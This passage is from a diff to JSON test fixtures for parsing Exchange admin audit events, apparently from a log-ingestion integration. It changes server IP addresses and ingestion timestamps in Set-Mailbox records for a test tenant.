bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}",
+ 
"ingested": "2021-12-09T13:42:30.853081600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:56\",\"ExternalAccess\":true,\"Id\":\"d83e97f0-951c-4ccc-630e-08d7ac0f267e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -1878,12 +1878,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -1926,7 +1926,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -1938,8 +1938,8 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "event": {
- "ingested": "2021-06-17T07:32:50.177632400Z",
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2cbbd2bb-607e-49b1-c02c-08d7adfc0e1c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}",
+ 
"ingested": "2021-12-09T13:42:30.853087900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2cbbd2bb-607e-49b1-c02c-08d7adfc0e1c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -1959,12 +1959,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -2007,7 +2007,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -2019,8 +2019,8 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "event": {
- "ingested": "2021-06-17T07:32:50.177635100Z",
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"165a283d-6f9b-4dc2-1b86-08d7ac0f273c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}",
+ 
"ingested": "2021-12-09T13:42:30.853093900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"165a283d-6f9b-4dc2-1b86-08d7ac0f273c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -2040,12 +2040,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -2088,7 +2088,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -2100,8 +2100,8 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "event": {
- "ingested": "2021-06-17T07:32:50.177637800Z",
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:16\",\"ExternalAccess\":true,\"Id\":\"979931d3-c99d-45b1-14e1-08d7ac0f3209\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}",
+ 
"ingested": "2021-12-09T13:42:30.853099700Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:16\",\"ExternalAccess\":true,\"Id\":\"979931d3-c99d-45b1-14e1-08d7ac0f3209\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -2121,12 +2121,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -2169,7 +2169,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -2181,8 +2181,8 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "event": {
- "ingested": "2021-06-17T07:32:50.177641200Z",
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"4bddac31-664e-4432-d181-08d7ac0f34d2\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}",
+ 
"ingested": "2021-12-09T13:42:30.853105500Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"4bddac31-664e-4432-d181-08d7ac0f34d2\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -2202,12 +2202,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2250,7 +2250,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -2262,8 +2262,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177643900Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:14\",\"ExternalAccess\":true,\"Id\":\"4d2e1010-489d-4aa0-e300-08d7ac0f314c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853111300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:14\",\"ExternalAccess\":true,\"Id\":\"4d2e1010-489d-4aa0-e300-08d7ac0f314c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 